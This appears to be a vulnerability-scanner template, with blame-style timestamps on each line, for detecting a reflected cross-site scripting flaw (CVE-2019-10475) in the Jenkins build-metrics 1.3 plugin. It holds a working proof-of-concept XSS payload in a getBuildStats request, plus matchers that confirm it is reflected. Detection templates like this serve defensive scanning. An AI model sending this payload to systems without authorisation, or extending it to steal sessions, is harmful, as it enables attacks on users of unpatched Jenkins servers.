2021-01-02 04:59:06 +00:00
id : CVE-2019-10475
2020-04-08 12:41:36 +00:00
info :
2022-08-12 00:45:50 +00:00
name : Jenkins build-metrics 1.3 - Cross-Site Scripting
2020-04-08 12:41:36 +00:00
author : madrobot
2020-05-25 07:49:06 +00:00
severity : medium
2022-08-12 00:45:50 +00:00
description : Jenkins build-metrics 1.3 is vulnerable to a reflected cross-site scripting vulnerability that allows attackers to inject arbitrary HTML and JavaScript into the web pages the plugin provides.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, leading to potential data theft or unauthorized actions.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to a patched version of the Jenkins build-metrics plugin or apply the necessary fixes provided by the vendor.
2021-09-10 11:26:40 +00:00
reference :
- https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490
- http://www.openwall.com/lists/oss-security/2019/10/23/2
- http://packetstormsecurity.com/files/155200/Jenkins-Build-Metrics-1.3-Cross-Site-Scripting.html
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-10475
2024-01-29 17:11:14 +00:00
- https://github.com/reph0r/poc-exp
2022-04-22 10:38:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2019-10475
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.97301
2024-04-08 11:34:33 +00:00
epss-percentile : 0.99859
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:jenkins:build-metrics:*:*:*:*:*:jenkins:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : jenkins
product : build-metrics
2023-09-06 12:53:28 +00:00
framework : jenkins
2023-07-11 19:49:27 +00:00
tags : cve,cve2019,jenkins,xss,plugin,packetstorm
2020-04-08 12:41:36 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-04-08 12:41:36 +00:00
- method : GET
path :
- "{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"
2023-07-11 19:49:27 +00:00
2020-07-08 11:38:57 +00:00
matchers-condition : and
2020-04-08 12:41:36 +00:00
matchers :
2020-04-08 13:17:20 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-04-08 13:24:27 +00:00
words :
2020-05-25 07:49:06 +00:00
- "<svg/onload=alert(1337)>"
2020-12-13 19:24:23 +00:00
- type : word
2023-07-11 19:49:27 +00:00
part : header
2020-12-13 19:24:23 +00:00
words :
- "text/html"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4b0a00483046022100dc94a63bb9257fa228726bcf29cfbe0a229e465f764ac1171e35d57315a944a0022100beb7f2b019f71c9fd84a9f74a5d739377d1e70541ae889c8f961a6aea511ad68:922c64590222798bb761d5b6d8e72950